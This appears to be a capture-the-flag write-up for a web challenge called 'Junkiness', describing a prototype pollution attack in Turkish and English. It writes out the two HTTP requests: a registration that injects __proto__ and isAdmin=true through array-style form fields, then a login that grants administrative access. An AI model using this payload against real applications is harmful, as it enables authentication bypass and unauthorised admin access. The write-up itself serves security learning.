SoyluEren2004/TRX-CTF-2026/web_Junkiness/Solve.md

     Injecting the Payload: Send the intercepted request to the Repeater module.
 Modify the body to include the Prototype Pollution payload (e.g., using username[] for length bypass and __proto__ for property injection).

     Authentication Bypass: Once the server responds with a "Success" message, use the poisoned parameters to perform a login.
 Since the global object is now polluted, the application will grant administrative access upon login.

+POST /register HTTP/1.1
+Host: localhost:3000
+Content-Type: application/x-www-form-urlencoded

+username[]=__proto__&password[isAdmin]=true&password[password]=1

+POST /login HTTP/1.1
+Host: localhost:3000
+Content-Type: application/x-www-form-urlencoded

+username=password&password=1

+🇹🇷 Türkçe:
+Eğer payload başarılı bir şekilde işlendiyse ve sisteme giriş yapabiliyorsanız, (exploit) sürecimiz tamamlanmış demektir.
+Bu aşamadan sonra tarayıcı üzerinden giriş paneline dönüp bilgilerinizle giriş yapabilir ve "Free Flag" butonuna tıklayarak bayrağı elde edebilirsiniz.

+🇺🇸 English:
+If the payload has been processed successfully and you are able to log in, the exploitation process is complete.
+At this stage, you can return to the login panel via your browser, sign in with your credentials, and capture the flag by clicking the "Free Flag" button.